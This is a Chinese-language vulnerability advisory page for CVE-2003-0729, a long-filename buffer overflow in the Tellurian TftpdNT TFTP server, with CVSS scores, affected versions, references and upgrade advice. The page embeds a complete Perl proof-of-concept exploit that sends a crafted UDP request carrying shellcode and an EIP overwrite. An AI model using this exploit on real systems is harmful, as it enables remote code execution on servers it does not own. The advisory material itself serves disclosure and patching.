CVE-2003-0729
CVSS7.5
发布时间 :2003-10-20 00:00:00
修订时间 :2016-10-17 22:36:57
NMCOES    

[原文]Buffer overflow in Tellurian TftpdNT 1.8 allows remote attackers to execute arbitrary code via a TFTP request with a long filename.


[CNNVD]Tellurian TftpdNT超长文件名缓冲区溢出漏洞(CNNVD-200310-051)

        
        Tellurian TftpdNT是一款Windows下的TFTP服务器。
        Tellurian TftpdNT没有正确处理超长文件名,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以TftpdNT进程权限在系统上执行任意指令。
        当程序处理用户提供的超长文件名时,由于缺少充分的边界缓冲区检查,可导致攻击者破坏内部进程内存,精心构建文件名数据可能以TftpdNT进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:tellurian:tftpdnt:2.0
cpe:/a:tellurian:tftpdnt:1.8

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0729
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0729
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-051
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0091.html
(VENDOR_ADVISORY)  VULNWATCH  20030901 Security Vulnerability in Tellurian TftpdNT (Long Filename)
http://marc.info/?l=bugtraq&m=106252411425545&w=2
(UNKNOWN)  BUGTRAQ  20030901 Security Vulnerability in Tellurian TftpdNT (Long Filename)
http://www.securiteam.com/windowsntfocus/5RP0M1PAUM.html
(VENDOR_ADVISORY)  MISC  http://www.securiteam.com/windowsntfocus/5RP0M1PAUM.html

- 漏洞信息

Tellurian TftpdNT超长文件名缓冲区溢出漏洞
高危 边界条件错误
2003-10-20 00:00:00 2005-10-20 00:00:00
远程  
        
        Tellurian TftpdNT是一款Windows下的TFTP服务器。
        Tellurian TftpdNT没有正确处理超长文件名,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以TftpdNT进程权限在系统上执行任意指令。
        当程序处理用户提供的超长文件名时,由于缺少充分的边界缓冲区检查,可导致攻击者破坏内部进程内存,精心构建文件名数据可能以TftpdNT进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Tellurian
        ---------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级到TftpdNT 2.0.1:
        
        http://www.tellurian.com.au/products/trinkets/tftpdNT/

- 漏洞信息 (23066)

Tellurian TftpdNT 1.8/2.0 Long Filename Buffer Overrun Vulnerability (EDBID:23066)
windows remote
2003-08-27 Verified
0 storm
N/A [点击下载]
source: http://www.securityfocus.com/bid/8505/info

A vulnerability has been discovered in Tellurian TftpdNT that could allow a remote attacker to execute arbitrary code. The problem likely occurs due to insufficient bounds checking when handling user-supplied filenames. As a result, it may be possible for an attacker to corrupt internal process memory, ultimately allowing for the execution flow of the program to be controlled.

This vulnerability is said to affect Tullerian TftpdNT 2.0 and earlier. 

 #!/usr/bin/perl -w
 #Tellurian TFTP Server buffer overflow vulnerability

 use IO::Socket;
 $host = "192.168.1.44";
 $port = "69";

 $shellcode = "\x90\xCC\x90\x90\x90\x90\x8B\xEC\x55\x8B\xEC\x33\
 \xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45\xF9\x6D\xC6\x45\
 \xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\
 \x45\xFE\x65\xB8\xC3\xAF\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x5F";

 $buf = "\x00\x02";
 $buf .= "\x41"x(508-length($shellcode));
 $buf .= $shellcode;
 $buf .= "\x0F\x02\xC7"; # EIP
 $buf .= "\x00\x6E\x65\x74\x61\x73\x63\x69\x69\x00";

 print "Length: ", length($buf), "\n";

 $socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error:
 $@\n";
 $ipaddr = inet_aton($host) || $host;
 $portaddr = sockaddr_in($port, $ipaddr);
 send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";
 print "Done\n";
		

- 漏洞信息

6453
Tellurian TftpdNT Long Filename Request Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in TftpdNT. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long filename, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2003-09-01 Unknow
2003-09-01 Unknow

- 解决方案

Upgrade to version 2.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Tellurian TftpdNT Long Filename Buffer Overrun Vulnerability
Boundary Condition Error 8505
Yes No
2003-08-27 12:00:00 2009-07-11 11:56:00
The discovery of this vulnerability has been credited to STORM (storm@securiteam.com).

- 受影响的程序版本

Tellurian TftpdNT 2.0
Tellurian TftpdNT 1.8
Tellurian TftpdNT 2.0.1

- 不受影响的程序版本

Tellurian TftpdNT 2.0.1

- 漏洞讨论

A vulnerability has been discovered in Tellurian TftpdNT that could allow a remote attacker to execute arbitrary code. The problem likely occurs due to insufficient bounds checking when handling user-supplied filenames. As a result, it may be possible for an attacker to corrupt internal process memory, ultimately allowing for the execution flow of the program to be controlled.

This vulnerability is said to affect Tullerian TftpdNT 2.0 and earlier.

- 漏洞利用

An exploit is available.

- 解决方案

Tellurian has announced that TftpdNT 2.0.1 is not affected by this issue. As such, users are advised to upgrade as soon as possible.


Tellurian TftpdNT 1.8

Tellurian TftpdNT 2.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站